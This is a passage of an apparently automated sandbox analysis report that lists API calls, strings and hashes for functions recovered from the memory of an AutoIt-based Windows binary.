                                                                                                                                                                                                                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00A52B40
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A52F85
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A11802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A11488,?,00000000,?,?,?,?,00A1145A,00000000,?), ref: 00A11865
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001053), ref: 00A52FC1
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00A52FD8
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00A52FEE
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00A52FF9
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                                                                                    • Opcode ID: ee9335d0264dc979a2e1a09c85269996852165d672e7566233974a76a77e2bf9
                                                                                                                                                                                                                                                                                                    • Instruction ID: fed85342afa558ce8837ae402656dde1bf36c3bf0323970da5f5f0cc368a1484
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee9335d0264dc979a2e1a09c85269996852165d672e7566233974a76a77e2bf9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D12D230600242AFC725DF54C984BA9BBF5FF46302F184569F9959B6A2C731EC8ACF91
                                                                                                                                                                                                                                                                                                    Function 00A9316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 00A9319B
                                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A932C7
                                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00A93306
                                                                                                                                                                                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00A93316
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00A9335D
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00A93369
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00A933B2
                                                                                                                                                                                                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A933C1
                                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00A933D1
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00A933D5
                                                                                                                                                                                                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00A933E5
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A933EE
                                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00A933F7
                                                                                                                                                                                                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A93423
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00A9343A
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00A9347A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A9348E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00A9349F
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00A934D4
                                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00A934DF
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A934EA
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00A934F4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                                                    • Opcode ID: a431e5e6297303f8e675eb8c4e745b2e2b6807e6cfe6e4ccf6b6b903bd12cc53
                                                                                                                                                                                                                                                                                                    • Instruction ID: 938efb73abb2f944f43907960e3fe30deb0f2c9a8d7b884d907215c5971c77ff
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a431e5e6297303f8e675eb8c4e745b2e2b6807e6cfe6e4ccf6b6b903bd12cc53
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EB13D71A40216AFEB14DFA8CD89FAE7BB9EB49710F004115F915EB2D0DB74AD41CB50
                                                                                                                                                                                                                                                                                                    Function 00A85524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00A85532
                                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,00AADC30,?,\\.\,00AADCD0), ref: 00A8560F
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00AADC30,?,\\.\,00AADCD0), ref: 00A8577B
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                                                    • Opcode ID: ac81d25bc0f66cb14cec9cd12b1f43a7cddcbfe8c2408bc27899f455c5f759bd
                                                                                                                                                                                                                                                                                                    • Instruction ID: dda5ca73b13a655ebc9362e4a71b0f251cab48a7af63e1ea59d1b4c0b3d6683a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac81d25bc0f66cb14cec9cd12b1f43a7cddcbfe8c2408bc27899f455c5f759bd
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13619130E48905EFC728EF34CA919BDB7B2BF15350BA48866E847AB291E7319D41CB51
                                                                                                                                                                                                                                                                                                    Function 00AA1A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00AA1BC4
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00AA1BD9
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00AA1BE0
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00AA1C35
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00AA1C55
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00AA1C89
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AA1CA7
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AA1CB9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00AA1CCE
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00AA1CE1
                                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(00000000), ref: 00AA1D3D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00AA1D58
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00AA1D6C
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00AA1D84
                                                                                                                                                                                                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00AA1DAA
                                                                                                                                                                                                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00AA1DC4
                                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 00AA1DDB
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 00AA1E46
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                                                    • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                                                                    • Opcode ID: 75598398bf80a04a332af597558e576a923e20634545991b608d956622285176
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8ad420381799f1fedc8e5d68ae9d028507ed2f44a00ffc3ad6d4425c318d7430
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75598398bf80a04a332af597558e576a923e20634545991b608d956622285176
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0AB17C71604311AFD714DF64C985BAAFBE5FF85310F00891CF99A9B2A1CB71E845CBA2
                                                                                                                                                                                                                                                                                                    Function 00AA0CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00AA0D81
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA0DBB
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA0E25
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA0E8D
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA0F11
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00AA0F61
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AA0FA0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A2FD52: _wcslen.LIBCMT ref: 00A2FD5D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A72BA5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A72BD7
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                                                    • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4c3e8e7f7c51399cc49f8ad76a2d66d72a9ca553eef0e3831cbffe7f4e16237b
                                                                                                                                                                                                                                                                                                    • Instruction ID: f555f20a2f7abf224a007e7e4fe50e5c956d4b0e2c4101fe193c87821785546e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c3e8e7f7c51399cc49f8ad76a2d66d72a9ca553eef0e3831cbffe7f4e16237b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EE1CE312083419FC714DF28CA5196AB3E6BF8A314F14896DF8969B3E1DB30ED45CB91
                                                                                                                                                                                                                                                                                                    Function 00A12521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A125F8
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00A12600
                                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A1262B
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00A12633
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00A12658
                                                                                                                                                                                                                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A12675
                                                                                                                                                                                                                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A12685
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A126B8
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A126CC
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00A126EA
                                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00A12706
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A12711
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A119CD: GetCursorPos.USER32(?), ref: 00A119E1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A119CD: ScreenToClient.USER32(00000000,?), ref: 00A119FE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A119CD: GetAsyncKeyState.USER32(00000001), ref: 00A11A23
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A119CD: GetAsyncKeyState.USER32(00000002), ref: 00A11A3D
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00A1199C), ref: 00A12738
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                                                    • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1d1b4b1f9b566f7d9a1f98850c10df99c76656466683850243e6b2bd8545016e
                                                                                                                                                                                                                                                                                                    • Instruction ID: c9f64fa6fd15038287094bb3e017fcace3b1a7b7ec2c43d28a2e128ceb87c5c4
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d1b4b1f9b566f7d9a1f98850c10df99c76656466683850243e6b2bd8545016e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7B15971A0020A9FDF14DFA8CC95BEA7BB5FB88315F104229FA56AB2D0DB74D941CB50
                                                                                                                                                                                                                                                                                                    Function 00A716D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A71A60
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A714E7,?,?,?), ref: 00A71A6C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A714E7,?,?,?), ref: 00A71A7B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A714E7,?,?,?), ref: 00A71A82
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A71A99
                                                                                                                                                                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A71741
                                                                                                                                                                                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A71775
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00A7178C
                                                                                                                                                                                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00A717C6
                                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A717E2
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00A717F9
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A71801
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00A71808
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A71829
                                                                                                                                                                                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00A71830
                                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A7185F
                                                                                                                                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A71881
                                                                                                                                                                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A71893
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A718BA
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A718C1
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A718CA
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A718D1
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A718DA
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A718E1
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00A718ED
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A718F4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71ADF: GetProcessHeap.KERNEL32(00000008,00A714FD,?,00000000,?,00A714FD,?), ref: 00A71AED
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A714FD,?), ref: 00A71AF4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A714FD,?), ref: 00A71B03
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: d620c99b13c74b55b61f25258fb66c0c3e2a4256cdda9b0827b9c7f99d397e8e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9417d3f1b3b09345c05edb60119d2ab43e98e3c0b224f0f2bf137748503291bb
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d620c99b13c74b55b61f25258fb66c0c3e2a4256cdda9b0827b9c7f99d397e8e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1714BB2D0020AABDF10DFE9DC44FEFBBB8AF05350F14C125E95AA6190D7319A06CB61
                                                                                                                                                                                                                                                                                                    Function 00A9CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A9CF1D
                                                                                                                                                                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00AADCD0,00000000,?,00000000,?,?), ref: 00A9CFA4
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00A9D004
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A9D054
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A9D0CF
                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00A9D112
